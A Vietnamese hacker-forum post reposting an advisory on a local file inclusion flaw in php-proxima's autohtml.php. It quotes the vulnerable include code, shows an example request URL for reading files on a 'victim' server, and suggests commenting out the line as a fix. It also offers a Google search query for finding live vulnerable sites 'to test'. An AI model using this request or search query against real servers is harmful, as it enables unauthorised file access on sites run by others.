Hacker
Bạn có muốn phản ứng với tin nhắn này? Vui lòng đăng ký diễn đàn trong một vài cú nhấp chuột hoặc đăng nhập để tiếp tục.


Forum Hacker Viet Nam
 
Trang ChínhLatest imagesTìm kiếmĐăng kýĐăng Nhập

 

 Lỗi của php-proxima, Remote File Access

Go down 
Tác giảThông điệp
hackervn1992

hackervn1992


Tổng số bài gửi : 200
Join date : 22/10/2010

Lỗi của php-proxima, Remote File Access Empty
Bài gửiTiêu đề: Lỗi của php-proxima, Remote File Access   Lỗi của php-proxima, Remote File Access EmptySat Oct 23, 2010 6:00 pm

Thông tin:
Homepage : http://www.php-proxima.com/
Vendor : informed
Mailed advisory: 14/05/03
Vender Response : None
Affected Versions: php-proxima 6.0 và những version trước đó


Lỗi:
php-proxima là một hệ thống portal được viết bằng php. php-proxima khác với những version của php-nuke và có những cái thay đổi

Một trong những cái thay đổi đó là php-proxima có chứa một file gọi là autohtml.php.

Bằng cách gửi một yêu cầu đặc biệt như bên dưới, attacker có thể include local file và đọc được chúng.

Lỗi này xuất hiện ở đây:
***************************
..

witch($op) {

case "modload":
if (!isset($mainfile)) { include("mainfile.php"); }
$index = 0;
include("header.php");
OpenTable();
include("autohtml/$name");

..
***************************
Một user có thể tránh include mainfile.php và chèn bất kỳ cái gì vào $name.


Ví dụ:

+http://victim/autohtml.php?op=modload&mainfile=x&name=<local filename>


Giải pháp:

Thay dòng
include("autohtml/$name");
bằng:
// include("autohtml/$name");
Kiểm tra patch mới.
Có thể vào google tìm cũng có nhiều cho các bạn test:allinurl: /autohtml.php?op=

Về Đầu Trang Go down
 
Lỗi của php-proxima, Remote File Access
Về Đầu Trang 
Trang 1 trong tổng số 1 trang
 Similar topics
-
» Acess share file :
» Kỹ thuật gắn Trojan vào file HTML :
» Chạy file trên máy của victim :
» Sử dụng REM VIEW để xem file trên Server :
» Đôi nét về Remote Networking :

Permissions in this forum:Bạn không có quyền trả lời bài viết
Hacker :: Security :: Hacker and Security-
Chuyển đến